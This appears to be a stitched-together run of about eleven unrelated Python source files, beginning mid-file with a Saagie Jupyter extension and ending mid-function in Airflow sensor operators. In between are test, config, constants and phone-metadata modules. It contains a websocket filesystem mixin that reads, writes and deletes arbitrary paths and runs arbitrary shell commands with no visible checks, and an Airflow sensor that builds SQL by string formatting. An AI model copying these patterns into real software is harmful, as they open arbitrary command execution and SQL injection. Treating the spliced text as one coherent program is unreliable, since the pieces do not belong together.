        requests.post(JOB_UPGRADE_URL_PATTERN % (platform_id, job.id),
                     json={'current': current}, auth=SAAGIE_BASIC_AUTH_TOKEN)
        job.last_run = None
        return views.render('starting_job', notebook, {'job': job})

    context = get_job_form(method, notebook, data)
    context['action'] = '/saagie?view=update_python_job'
    context['username'] = SAAGIE_USERNAME
    return context


@views.add
@login_required
def select_python_job(method, notebook, data):
    if method == 'POST':
        platform_id, job_id = data['job'].split('-')
        notebook.current_job = SaagieJob.from_id(notebook, platform_id, job_id)
        return views.render('update_python_job', notebook, data)
    jobs_by_platform = []
    for platform in notebook.get_platforms():
        jobs = platform.get_jobs()
        if jobs:
            jobs_by_platform.append((platform,
                                     list(sorted(jobs, reverse=True))))
    return {'jobs_by_platform': jobs_by_platform,
            'action': '/saagie?view=select_python_job', 'username': SAAGIE_USERNAME}


@views.add
@login_required
def unsupported_kernel(method, notebook, data):
    return {'username': SAAGIE_USERNAME}


@views.add
@login_required
def starting_job(method, notebook, data):
    job = notebook.current_job
    job.fetch_logs()
    if job.is_started:
        return views.render('started_job', notebook, {'job': job})
    return {'job': job, 'username': SAAGIE_USERNAME}


@views.add
@login_required
def started_job(method, notebook, data):
    return {'job': notebook.current_job, 'username': SAAGIE_USERNAME}

@views.add
def logout(method, notebook, data):
    global SAAGIE_BASIC_AUTH_TOKEN
    global SAAGIE_ROOT_URL
    global SAAGIE_USERNAME
    SAAGIE_BASIC_AUTH_TOKEN = None
    SAAGIE_ROOT_URL = None
    SAAGIE_USERNAME = None
    return {}

def load_jupyter_server_extension(nb_app):
    web_app = nb_app.web_app
    base_url = web_app.settings['base_url']

    route_pattern = url_path_join(base_url, '/saagie')
    web_app.add_handlers('.*$', [(route_pattern, SaagieHandler)])

    route_pattern = url_path_join(base_url, '/saagie/check')
    web_app.add_handlers('.*$', [(route_pattern, SaagieCheckHandler)])

import numpy as np


class WordClusters(object):
    def __init__(self, vocab, clusters):
        self.vocab = vocab
        self.clusters = clusters

    def ix(self, word):
        """
        Returns the index on self.vocab and self.clusters for 'word'
        """
        temp = np.where(self.vocab == word)[0]
        if temp.size == 0:
            raise KeyError("Word not in vocabulary")
        else:
            return temp[0]

    def __getitem__(self, word):
        return self.get_cluster(word)

    def get_cluster(self, word):
        """
        Returns the cluster number for a word in the vocabulary
        """
        idx = self.ix(word)
        return self.clusters[idx]

    def get_words_on_cluster(self, cluster):
        return self.vocab[self.clusters == cluster]

    @classmethod
    def from_text(cls, fname):
        vocab = np.genfromtxt(fname, dtype=str, delimiter=" ", usecols=0)
        clusters = np.genfromtxt(fname, dtype=int, delimiter=" ", usecols=1)
        return cls(vocab=vocab, clusters=clusters)

"""api_server URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
Including another URLconf
    1. Import the include() function: from django.conf.urls import url, include
    2. Add a URL to urlpatterns:  url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin

version = 'v1.0'

urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'api/%s/' % version, include('apis.urls'))
]

import os,json

from cgi import escape
def unescape(s):
    s = s.replace("&lt;", "<")
    s = s.replace("&gt;", ">")
    # this has to be last:
    s = s.replace("&amp;", "&")
    return s

class FilesystemMixin:
    def h_fs_get(_,path,eltName=''):
        from stat import S_ISDIR
        data = (escape(open(path).read())
                if not S_ISDIR(os.stat(path).st_mode)
                else [(p,S_ISDIR(os.stat(path+'/'+p).st_mode))
                        for p in os.listdir(path)])
        _.ws.send(json.dumps({"method":"fs_get","result":[path,data,eltName]}))
        pass
    def h_fs_put(_,path,data):
        f=open(path,'w')
        for x in data: f.write(unescape(x))
        f.close()
        pass
    def h_fs_system(_,path,eltName='',cwd=None):
        import subprocess as sp
        import shlex
        data=sp.Popen(shlex.split(path),cwd=cwd,stdout=sp.PIPE, stderr=sp.PIPE).communicate()
        _.ws.send(json.dumps({"method":"fs_system","result":[path,data,eltName]}));
        pass
    def h_fs_mkdir (_,path): os.mkdir(path)
    def h_fs_rmdir (_,path): os.rmdir(path)
    def h_fs_touch (_,path): open(path,'w').close()
    def h_fs_unlink(_,path): os.unlink(path)
    pass
class FsApp(FilesystemMixin):
    def __init__(_,ws):_.ws=ws

# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""
tests for catalog module
"""
import os

import fabric.api
from fabric.operations import _AttributeString
from mock import patch

from prestoadmin import catalog
from prestoadmin.util import constants
from prestoadmin.util.exception import ConfigurationError, \
    ConfigFileNotFoundError
from prestoadmin.standalone.config import PRESTO_STANDALONE_USER_GROUP
from prestoadmin.util.local_config_util import get_catalog_directory
from tests.unit.base_unit_case import BaseUnitCase


class TestCatalog(BaseUnitCase):
    def setUp(self):
        super(TestCatalog, self).setUp(capture_output=True)

    @patch('prestoadmin.catalog.os.path.isfile')
    def test_add_not_exist(self, isfile_mock):
        isfile_mock.return_value = False
        self.assertRaisesRegexp(ConfigurationError,
                                'Configuration for catalog dummy not found',
                                catalog.add, 'dummy')

    @patch('prestoadmin.catalog.validate')
    @patch('prestoadmin.catalog.deploy_files')
    @patch('prestoadmin.catalog.os.path.isfile')
    def test_add_exists(self, isfile_mock, deploy_mock, validate_mock):
        isfile_mock.return_value = True
        catalog.add('tpch')
        filenames = ['tpch.properties']
        deploy_mock.assert_called_with(filenames,
                                       get_catalog_directory(),
                                       constants.REMOTE_CATALOG_DIR,
                                       PRESTO_STANDALONE_USER_GROUP)
        validate_mock.assert_called_with(filenames)

    @patch('prestoadmin.catalog.deploy_files')
    @patch('prestoadmin.catalog.os.path.isdir')
    @patch('prestoadmin.catalog.os.listdir')
    @patch('prestoadmin.catalog.validate')
    def test_add_all(self, mock_validate, listdir_mock, isdir_mock,
                     deploy_mock):
        catalogs = ['tpch.properties', 'another.properties']
        listdir_mock.return_value = catalogs
        catalog.add()
        deploy_mock.assert_called_with(catalogs,
                                       get_catalog_directory(),
                                       constants.REMOTE_CATALOG_DIR,
                                       PRESTO_STANDALONE_USER_GROUP)

    @patch('prestoadmin.catalog.deploy_files')
    @patch('prestoadmin.catalog.os.path.isdir')
    def test_add_all_fails_if_dir_not_there(self, isdir_mock, deploy_mock):
        isdir_mock.return_value = False
        self.assertRaisesRegexp(ConfigFileNotFoundError,
                                r'Cannot add catalogs because directory .+'
                                r' does not exist',
                                catalog.add)
        self.assertFalse(deploy_mock.called)

    @patch('prestoadmin.catalog.sudo')
    @patch('prestoadmin.catalog.os.path.exists')
    @patch('prestoadmin.catalog.os.remove')
    def test_remove(self, local_rm_mock, exists_mock, sudo_mock):
        script = ('if [ -f /etc/presto/catalog/tpch.properties ] ; '
                  'then rm /etc/presto/catalog/tpch.properties ; '
                  'else echo "Could not remove catalog \'tpch\'. '
                  'No such file \'/etc/presto/catalog/tpch.properties\'"; fi')
        exists_mock.return_value = True
        fabric.api.env.host = 'localhost'
        catalog.remove('tpch')
        sudo_mock.assert_called_with(script)
        local_rm_mock.assert_called_with(get_catalog_directory() +
                                         '/tpch.properties')

    @patch('prestoadmin.catalog.sudo')
    @patch('prestoadmin.catalog.os.path.exists')
    def test_remove_failure(self, exists_mock, sudo_mock):
        exists_mock.return_value = False
        fabric.api.env.host = 'localhost'
        out = _AttributeString()
        out.succeeded = False
        sudo_mock.return_value = out
        self.assertRaisesRegexp(SystemExit,
                                '\\[localhost\\] Failed to remove catalog tpch.',
                                catalog.remove,
                                'tpch')

    @patch('prestoadmin.catalog.sudo')
    @patch('prestoadmin.catalog.os.path.exists')
    def test_remove_no_such_file(self, exists_mock, sudo_mock):
        exists_mock.return_value = False
        fabric.api.env.host = 'localhost'
        error_msg = ('Could not remove catalog tpch: No such file ' +
                     os.path.join(get_catalog_directory(), 'tpch.properties'))
        out = _AttributeString(error_msg)
        out.succeeded = True
        sudo_mock.return_value = out
        self.assertRaisesRegexp(SystemExit,
                                '\\[localhost\\] %s' % error_msg,
                                catalog.remove,
                                'tpch')

    @patch('prestoadmin.catalog.os.listdir')
    @patch('prestoadmin.catalog.os.path.isdir')
    def test_warning_if_connector_dir_empty(self, isdir_mock, listdir_mock):
        isdir_mock.return_value = True
        listdir_mock.return_value = []
        catalog.add()
        self.assertEqual('\nWarning: Directory %s is empty. No catalogs will'
                         ' be deployed\n\n' % get_catalog_directory(),
                         self.test_stderr.getvalue())

    @patch('prestoadmin.catalog.os.listdir')
    @patch('prestoadmin.catalog.os.path.isdir')
    def test_add_permission_denied(self, isdir_mock, listdir_mock):
        isdir_mock.return_value = True
        error_msg = ('Permission denied')
        listdir_mock.side_effect = OSError(13, error_msg)
        fabric.api.env.host = 'localhost'
        self.assertRaisesRegexp(SystemExit, '\[localhost\] %s' % error_msg,
                                catalog.add)

    @patch('prestoadmin.catalog.os.remove')
    @patch('prestoadmin.catalog.remove_file')
    def test_remove_os_error(self, remove_file_mock, remove_mock):
        fabric.api.env.host = 'localhost'
        error = OSError(13, 'Permission denied')
        remove_mock.side_effect = error
        self.assertRaisesRegexp(OSError, 'Permission denied',
                                catalog.remove, 'tpch')

    @patch('prestoadmin.catalog.secure_create_directory')
    @patch('prestoadmin.util.fabricapi.put')
    def test_deploy_files(self, put_mock, create_dir_mock):
        local_dir = '/my/local/dir'
        remote_dir = '/my/remote/dir'
        catalog.deploy_files(['a', 'b'], local_dir, remote_dir,
                             PRESTO_STANDALONE_USER_GROUP)
        create_dir_mock.assert_called_with(remote_dir, PRESTO_STANDALONE_USER_GROUP)
        put_mock.assert_any_call('/my/local/dir/a', remote_dir, use_sudo=True,
                                 mode=0600)
        put_mock.assert_any_call('/my/local/dir/b', remote_dir, use_sudo=True,
                                 mode=0600)

    @patch('prestoadmin.catalog.os.path.isfile')
    @patch("__builtin__.open")
    def test_validate(self, open_mock, is_file_mock):
        is_file_mock.return_value = True
        file_obj = open_mock.return_value.__enter__.return_value
        file_obj.read.return_value = 'connector.noname=example'

        self.assertRaisesRegexp(ConfigurationError,
                                'Catalog configuration example.properties '
                                'does not contain connector.name',
                                catalog.add, 'example')

    @patch('prestoadmin.catalog.os.path.isfile')
    def test_validate_fail(self, is_file_mock):
        is_file_mock.return_value = True

        self.assertRaisesRegexp(
            SystemExit,
            'Error validating ' + os.path.join(get_catalog_directory(), 'example.properties') + '\n\n'
            'Underlying exception:\n    No such file or directory',
            catalog.add, 'example')

    @patch('prestoadmin.catalog.get')
    @patch('prestoadmin.catalog.files.exists')
    @patch('prestoadmin.catalog.ensure_directory_exists')
    @patch('prestoadmin.catalog.os.path.exists')
    def test_gather_connectors(self, path_exists, ensure_dir_exists,
                               files_exists, get_mock):
        fabric.api.env.host = 'any_host'
        path_exists.return_value = False
        files_exists.return_value = True
        catalog.gather_catalogs('local_config_dir')
        get_mock.assert_called_once_with(
            constants.REMOTE_CATALOG_DIR, 'local_config_dir/any_host/catalog', use_sudo=True)

        # if remote catalog dir does not exist
        get_mock.reset_mock()
        files_exists.return_value = False
        results = catalog.gather_catalogs('local_config_dir')
        self.assertEqual([], results)
        self.assertFalse(get_mock.called)

"""
Installs and configures MySQL
"""

import uuid
import logging

from packstack.installer import validators
from packstack.installer import utils

from packstack.modules.ospluginutils import getManifestTemplate, appendManifestFile

# Controller object will be initialized from main flow
controller = None

# Plugin name
PLUGIN_NAME = "OS-MySQL"
PLUGIN_NAME_COLORED = utils.color_text(PLUGIN_NAME, 'blue')

logging.debug("plugin %s loaded", __name__)

def initConfig(controllerObject):
    global controller
    controller = controllerObject
    logging.debug("Adding MySQL OpenStack configuration")
    paramsList = [
                  {"CMD_OPTION"      : "mysql-host",
                   "USAGE"           : "The IP address of the server on which to install MySQL",
                   "PROMPT"          : "Enter the IP address of the MySQL server",
                   "OPTION_LIST"     : [],
                   "VALIDATORS"      : [validators.validate_ssh],
                   "DEFAULT_VALUE"   : utils.get_localhost_ip(),
                   "MASK_INPUT"      : False,
                   "LOOSE_VALIDATION": True,
                   "CONF_NAME"       : "CONFIG_MYSQL_HOST",
                   "USE_DEFAULT"     : False,
                   "NEED_CONFIRM"    : False,
                   "CONDITION"       : False },
                  {"CMD_OPTION"      : "mysql-user",
                   "USAGE"           : "Username for the MySQL admin user",
                   "PROMPT"          : "Enter the username for the MySQL admin user",
                   "OPTION_LIST"     : [],
                   "VALIDATORS"      : [validators.validate_not_empty],
                   "DEFAULT_VALUE"   : "root",
                   "MASK_INPUT"      : False,
                   "LOOSE_VALIDATION": False,
                   "CONF_NAME"       : "CONFIG_MYSQL_USER",
                   "USE_DEFAULT"     : True,
                   "NEED_CONFIRM"    : False,
                   "CONDITION"       : False },
                  {"CMD_OPTION"      : "mysql-pw",
                   "USAGE"           : "Password for the MySQL admin user",
                   "PROMPT"          : "Enter the password for the MySQL admin user",
                   "OPTION_LIST"     : [],
                   "VALIDATORS"      : [validators.validate_not_empty],
                   "DEFAULT_VALUE"   : uuid.uuid4().hex[:16],
                   "MASK_INPUT"      : True,
                   "LOOSE_VALIDATION": True,
                   "CONF_NAME"       : "CONFIG_MYSQL_PW",
                   "USE_DEFAULT"     : False,
                   "NEED_CONFIRM"    : True,
                   "CONDITION"       : False },
                 ]

    groupDict = { "GROUP_NAME"            : "MYSQL",
                  "DESCRIPTION"           : "MySQL Config parameters",
                  "PRE_CONDITION"         : lambda x: 'yes',
                  "PRE_CONDITION_MATCH"   : "yes",
                  "POST_CONDITION"        : False,
                  "POST_CONDITION_MATCH"  : True}

    controller.addGroup(groupDict, paramsList)


def initSequences(controller):
    mysqlsteps = [
             {'title': 'Adding MySQL manifest entries',
              'functions':[createmanifest]}
    ]
    controller.addSequence("Installing MySQL", [], [], mysqlsteps)


def createmanifest(config):
    if config['CONFIG_MYSQL_INSTALL'] == 'y':
        install = True
        suffix = 'install'
    else:
        install = False
        suffix = 'noinstall'

    # In case we are not installing MySQL server, mysql* manifests have
    # to be run from Keystone host
    host = install and config['CONFIG_MYSQL_HOST'] \
                    or config['CONFIG_KEYSTONE_HOST']
    manifestfile = "%s_mysql.pp" % host
    manifestdata = [getManifestTemplate('mysql_%s.pp' % suffix)]

    def append_for(module, suffix):
        # Modules have to be appended to the existing mysql.pp
        # otherwise pp will fail for some of them saying that
        # Mysql::Config definition is missing.
        template = "mysql_%s_%s.pp" % (module, suffix)
        manifestdata.append(getManifestTemplate(template))

    append_for("keystone", suffix)
    hosts = set()
    for mod in ['nova', 'cinder', 'glance', 'neutron', 'heat']:
        if config['CONFIG_%s_INSTALL' % mod.upper()] == 'y':
            append_for(mod, suffix)
            # Check wich modules are enabled so we can allow their
            # hosts on the firewall
            if mod != 'nova' and mod != 'neutron':
                hosts.add(config.get('CONFIG_%s_HOST' % mod.upper()).strip())
            elif mod == 'neutron':
                hosts.add(config.get('CONFIG_NEUTRON_SERVER_HOST').strip())
            elif config['CONFIG_NOVA_INSTALL'] != 'n':
                #In that remote case that we have lot's of nova hosts
                hosts.add(config.get('CONFIG_NOVA_API_HOST').strip())
                hosts.add(config.get('CONFIG_NOVA_CERT_HOST').strip())
                hosts.add(config.get('CONFIG_NOVA_VNCPROXY_HOST').strip())
                hosts.add(config.get('CONFIG_NOVA_CONDUCTOR_HOST').strip())
                hosts.add(config.get('CONFIG_NOVA_SCHED_HOST').strip())
                if config['CONFIG_NEUTRON_INSTALL'] != 'y':
                    dbhosts = split_hosts(config['CONFIG_NOVA_NETWORK_HOSTS'])
                    hosts |= dbhosts
                for host in config.get('CONFIG_NOVA_COMPUTE_HOSTS').split(','):
                    hosts.add(host.strip())

    config['FIREWALL_ALLOWED'] = ",".join(["'%s'" % i for i in hosts])
    config['FIREWALL_SERVICE_NAME'] = "mysql"
    config['FIREWALL_PORTS'] = "'3306'"
    manifestdata.append(getManifestTemplate("firewall.pp"))

    appendManifestFile(manifestfile, "\n".join(manifestdata), 'pre')

def power_digit_sum(exponent):
    power_of_2 = str(2 ** exponent)
    return sum([int(x) for x in power_of_2])
# Copyright 2022 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Constants for music processing in Magenta."""

# Meter-related constants.
DEFAULT_QUARTERS_PER_MINUTE = 120.0
DEFAULT_STEPS_PER_BAR = 16  # 4/4 music sampled at 4 steps per quarter note.
DEFAULT_STEPS_PER_QUARTER = 4

# Default absolute quantization.
DEFAULT_STEPS_PER_SECOND = 100

# Standard pulses per quarter.
# https://en.wikipedia.org/wiki/Pulses_per_quarter_note
STANDARD_PPQ = 220

# Special melody events.
NUM_SPECIAL_MELODY_EVENTS = 2
MELODY_NOTE_OFF = -1
MELODY_NO_EVENT = -2

# Other melody-related constants.
MIN_MELODY_EVENT = -2
MAX_MELODY_EVENT = 127
MIN_MIDI_PITCH = 0  # Inclusive.
MAX_MIDI_PITCH = 127  # Inclusive.
NUM_MIDI_PITCHES = MAX_MIDI_PITCH - MIN_MIDI_PITCH + 1
NOTES_PER_OCTAVE = 12

# Velocity-related constants.
MIN_MIDI_VELOCITY = 1  # Inclusive.
MAX_MIDI_VELOCITY = 127  # Inclusive.

# Program-related constants.
MIN_MIDI_PROGRAM = 0
MAX_MIDI_PROGRAM = 127

# MIDI programs that typically sound unpitched.
UNPITCHED_PROGRAMS = (
    list(range(96, 104)) + list(range(112, 120)) + list(range(120, 128)))

# Chord symbol for "no chord".
NO_CHORD = 'N.C.'

# The indices of the pitch classes in a major scale.
MAJOR_SCALE = [0, 2, 4, 5, 7, 9, 11]

# NOTE_KEYS[note] = The major keys that note belongs to.
# ex. NOTE_KEYS[0] lists all the major keys that contain the note C,
# which are:
# [0, 1, 3, 5, 7, 8, 10]
# [C, C#, D#, F, G, G#, A#]
#
# 0 = C
# 1 = C#
# 2 = D
# 3 = D#
# 4 = E
# 5 = F
# 6 = F#
# 7 = G
# 8 = G#
# 9 = A
# 10 = A#
# 11 = B
#
# NOTE_KEYS can be generated using the code below, but is explicitly declared
# for readability:
# NOTE_KEYS = [[j for j in range(12) if (i - j) % 12 in MAJOR_SCALE]
#              for i in range(12)]
NOTE_KEYS = [
    [0, 1, 3, 5, 7, 8, 10],
    [1, 2, 4, 6, 8, 9, 11],
    [0, 2, 3, 5, 7, 9, 10],
    [1, 3, 4, 6, 8, 10, 11],
    [0, 2, 4, 5, 7, 9, 11],
    [0, 1, 3, 5, 6, 8, 10],
    [1, 2, 4, 6, 7, 9, 11],
    [0, 2, 3, 5, 7, 8, 10],
    [1, 3, 4, 6, 8, 9, 11],
    [0, 2, 4, 5, 7, 9, 10],
    [1, 3, 5, 6, 8, 10, 11],
    [0, 2, 4, 6, 7, 9, 11]
]

# Copyright 2018 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing classes related to AWS CloudWatch Logs."""

import json

from perfkitbenchmarker import resource
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.aws import util


class LogGroup(resource.BaseResource):
  """Class representing a CloudWatch log group."""

  def __init__(self, region, name, retention_in_days=7):
    super(LogGroup, self).__init__()
    self.region = region
    self.name = name
    self.retention_in_days = retention_in_days

  def _Create(self):
    """Create the log group."""
    create_cmd = util.AWS_PREFIX + [
        '--region', self.region,
        'logs', 'create-log-group',
        '--log-group-name', self.name
    ]
    vm_util.IssueCommand(create_cmd)

  def _Delete(self):
    """Delete the log group."""
    delete_cmd = util.AWS_PREFIX + [
        '--region', self.region,
        'logs', 'delete-log-group',
        '--log-group-name', self.name
    ]
    vm_util.IssueCommand(delete_cmd, raise_on_failure=False)

  def Exists(self):
    """Returns True if the log group exists."""
    describe_cmd = util.AWS_PREFIX + [
        '--region', self.region,
        'logs', 'describe-log-groups',
        '--log-group-name-prefix', self.name,
        '--no-paginate'
    ]
    stdout, _, _ = vm_util.IssueCommand(describe_cmd)
    log_groups = json.loads(stdout)['logGroups']
    group = next((group for group in log_groups
                  if group['logGroupName'] == self.name), None)
    return bool(group)

  def _PostCreate(self):
    """Set the retention policy."""
    put_cmd = util.AWS_PREFIX + [
        '--region', self.region,
        'logs', 'put-retention-policy',
        '--log-group-name', self.name,
        '--retention-in-days', str(self.retention_in_days)
    ]
    vm_util.IssueCommand(put_cmd)


def GetLogs(region, stream_name, group_name, token=None):
  """Fetches the JSON formatted log stream starting at the token."""
  get_cmd = util.AWS_PREFIX + [
      '--region', region,
      'logs', 'get-log-events',
      '--start-from-head',
      '--log-group-name', group_name,
      '--log-stream-name', stream_name,
  ]
  if token:
    get_cmd.extend(['--next-token', token])
  stdout, _, _ = vm_util.IssueCommand(get_cmd)
  return json.loads(stdout)


def GetLogStreamAsString(region, stream_name, log_group):
  """Returns the messages of the log stream as a string."""
  log_lines = []
  token = None
  events = []
  while token is None or events:
    response = GetLogs(region, stream_name, log_group, token)
    events = response['events']
    token = response['nextForwardToken']
    for event in events:
      log_lines.append(event['message'])
  return '\n'.join(log_lines)

"""Auto-generated file, do not edit by hand. BM metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata

PHONE_METADATA_BM = PhoneMetadata(id='BM', country_code=1, international_prefix='011',
    general_desc=PhoneNumberDesc(national_number_pattern='(?:441|[58]\\d\\d|900)\\d{7}', possible_length=(10,), possible_length_local_only=(7,)),
    fixed_line=PhoneNumberDesc(national_number_pattern='441(?:[46]\\d\\d|5(?:4\\d|60|89))\\d{4}', example_number='4414123456', possible_length=(10,), possible_length_local_only=(7,)),
    mobile=PhoneNumberDesc(national_number_pattern='441(?:[2378]\\d|5[0-39])\\d{5}', example_number='4413701234', possible_length=(10,), possible_length_local_only=(7,)),
    toll_free=PhoneNumberDesc(national_number_pattern='8(?:00|33|44|55|66|77|88)[2-9]\\d{6}', example_number='8002123456', possible_length=(10,)),
    premium_rate=PhoneNumberDesc(national_number_pattern='900[2-9]\\d{6}', example_number='9002123456', possible_length=(10,)),
    personal_number=PhoneNumberDesc(national_number_pattern='52(?:3(?:[2-46-9][02-9]\\d|5(?:[02-46-9]\\d|5[0-46-9]))|4(?:[2-478][02-9]\\d|5(?:[034]\\d|2[024-9]|5[0-46-9])|6(?:0[1-9]|[2-9]\\d)|9(?:[05-9]\\d|2[0-5]|49)))\\d{4}|52[34][2-9]1[02-9]\\d{4}|5(?:00|2[12]|33|44|66|77|88)[2-9]\\d{6}', example_number='5002345678', possible_length=(10,)),
    national_prefix='1',
    national_prefix_for_parsing='1|([2-8]\\d{6})$',
    national_prefix_transform_rule='441\\1',
    leading_digits='441',
    mobile_number_portable_region=True)

# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from past.builtins import basestring

from datetime import datetime
import logging
from urllib.parse import urlparse
from time import sleep

import airflow
from airflow import hooks, settings
from airflow.exceptions import AirflowException, AirflowSensorTimeout, AirflowSkipException
from airflow.models import BaseOperator, TaskInstance, Connection as DB
from airflow.hooks.base_hook import BaseHook
from airflow.utils.state import State
from airflow.utils.decorators import apply_defaults


class BaseSensorOperator(BaseOperator):
    '''
    Sensor operators are derived from this class an inherit these attributes.

    Sensor operators keep executing at a time interval and succeed when
        a criteria is met and fail if and when they time out.

    :param soft_fail: Set to true to mark the task as SKIPPED on failure
    :type soft_fail: bool
    :param poke_interval: Time in seconds that the job should wait in
        between each tries
    :type poke_interval: int
    :param timeout: Time, in seconds before the task times out and fails.
    :type timeout: int
    '''
    ui_color = '#e6f1f2'

    @apply_defaults
    def __init__(
            self,
            poke_interval=60,
            timeout=60*60*24*7,
            soft_fail=False,
            *args, **kwargs):
        super(BaseSensorOperator, self).__init__(*args, **kwargs)
        self.poke_interval = poke_interval
        self.soft_fail = soft_fail
        self.timeout = timeout

    def poke(self, context):
        '''
        Function that the sensors defined while deriving this class should
        override.
        '''
        raise AirflowException('Override me.')

    def execute(self, context):
        started_at = datetime.now()
        while not self.poke(context):
            if (datetime.now() - started_at).total_seconds() > self.timeout:
                if self.soft_fail:
                    raise AirflowSkipException('Snap. Time is OUT.')
                else:
                    raise AirflowSensorTimeout('Snap. Time is OUT.')
            sleep(self.poke_interval)
        logging.info("Success criteria met. Exiting.")


class SqlSensor(BaseSensorOperator):
    """
    Runs a sql statement until a criteria is met. It will keep trying until
    sql returns no row, or if the first cell in (0, '0', '').

    :param conn_id: The connection to run the sensor against
    :type conn_id: string
    :param sql: The sql to run. To pass, it needs to return at least one cell
        that contains a non-zero / empty string value.
    """
    template_fields = ('sql',)
    template_ext = ('.hql', '.sql',)

    @apply_defaults
    def __init__(self, conn_id, sql, *args, **kwargs):
        self.sql = sql
        self.conn_id = conn_id
        super(SqlSensor, self).__init__(*args, **kwargs)

    def poke(self, context):
        hook = BaseHook.get_connection(self.conn_id).get_hook()

        logging.info('Poking: ' + self.sql)
        records = hook.get_records(self.sql)
        if not records:
            return False
        else:
            if str(records[0][0]) in ('0', '',):
                return False
            else:
                return True
            print(records[0][0])


class MetastorePartitionSensor(SqlSensor):
    """
    An alternative to the HivePartitionSensor that talk directly to the
    MySQL db. This was created as a result of observing sub optimal
    queries generated by the Metastore thrift service when hitting
    subpartitioned tables. The Thrift service's queries were written in a
    way that wouldn't leverage the indexes.

    :param schema: the schema
    :type schema: str
    :param table: the table
    :type table: str
    :param partition_name: the partition name, as defined in the PARTITIONS
        table of the Metastore. Order of the fields does matter.
        Examples: ``ds=2016-01-01`` or
        ``ds=2016-01-01/sub=foo`` for a sub partitioned table
    :type partition_name: str
    :param mysql_conn_id: a reference to the MySQL conn_id for the metastore
    :type mysql_conn_id: str
    """
    template_fields = ('partition_name', 'table', 'schema')

    @apply_defaults
    def __init__(
            self, table, partition_name, schema="default",
            mysql_conn_id="metastore_mysql",
            *args, **kwargs):

        self.partition_name = partition_name
        self.table = table
        self.schema = schema
        self.first_poke = True
        self.conn_id = mysql_conn_id
        super(SqlSensor, self).__init__(*args, **kwargs)

    def poke(self, context):
        if self.first_poke:
            self.first_poke = False
            if '.' in self.table:
                self.schema, self.table = self.table.split('.')
            self.sql = """
            SELECT 'X'
            FROM PARTITIONS A0
            LEFT OUTER JOIN TBLS B0 ON A0.TBL_ID = B0.TBL_ID
            LEFT OUTER JOIN DBS C0 ON B0.DB_ID = C0.DB_ID
            WHERE
                B0.TBL_NAME = '{self.table}' AND
                C0.NAME = '{self.schema}' AND
                A0.PART_NAME = '{self.partition_name}';
            """.format(self=self)
        return super(MetastorePartitionSensor, self).poke(context)


class ExternalTaskSensor(BaseSensorOperator):
    """
    Waits for a task to complete in a different DAG

    :param external_dag_id: The dag_id that contains the task you want to
        wait for
    :type external_dag_id: string
    :param external_task_id: The task_id that contains the task you want to
        wait for
    :type external_task_id: string
    :param allowed_states: list of allowed states, default is ``['success']``
    :type allowed_states: list
    :param execution_delta: time difference with the previous execution to
        look at, the default is the same execution_date as the current task.
        For yesterday, use [positive!] datetime.timedelta(days=1). Either
        execution_delta or execution_date_fn can be passed to
        ExternalTaskSensor, but not both.
    :type execution_delta: datetime.timedelta
    :param execution_date_fn: function that receives the current execution date
        and returns the desired execution date to query. Either execution_delta
        or execution_date_fn can be passed to ExternalTaskSensor, but not both.
    :type execution_date_fn: callable
    """

    @apply_defaults
    def __init__(
            self,
            external_dag_id,
            external_task_id,
            allowed_states=None,
            execution_delta=None,
            execution_date_fn=None,
            *args, **kwargs):
        super(ExternalTaskSensor, self).__init__(*args, **kwargs)
        self.allowed_states = allowed_states or [State.SUCCESS]
        if execution_delta is not None and execution_date_fn is not None:
            raise ValueError(
                'Only one of `execution_date` or `execution_date_fn` may'
                'be provided to ExternalTaskSensor; not both.')

        self.execution_delta = execution_delta
        self.execution_date_fn = execution_date_fn
        self.external_dag_id = external_dag_id
        self.external_task_id = external_task_id

    def poke(self, context):
        if self.execution_delta:
            dttm = context['execution_date'] - self.execution_delta
        elif self.execution_date_fn:
            dttm = self.execution_date_fn(context['execution_date'])
        else:
            dttm = context['execution_date']

        logging.info(
            'Poking for '
            '{self.external_dag_id}.'
            '{self.external_task_id} on '
            '{dttm} ... '.format(**locals()))
        TI = TaskInstance

        session = settings.Session()
        count = session.query(TI).filter(
            TI.dag_id == self.external_dag_id,
            TI.task_id == self.external_task_id,
            TI.state.in_(self.allowed_states),
            TI.execution_date == dttm,
        ).count()
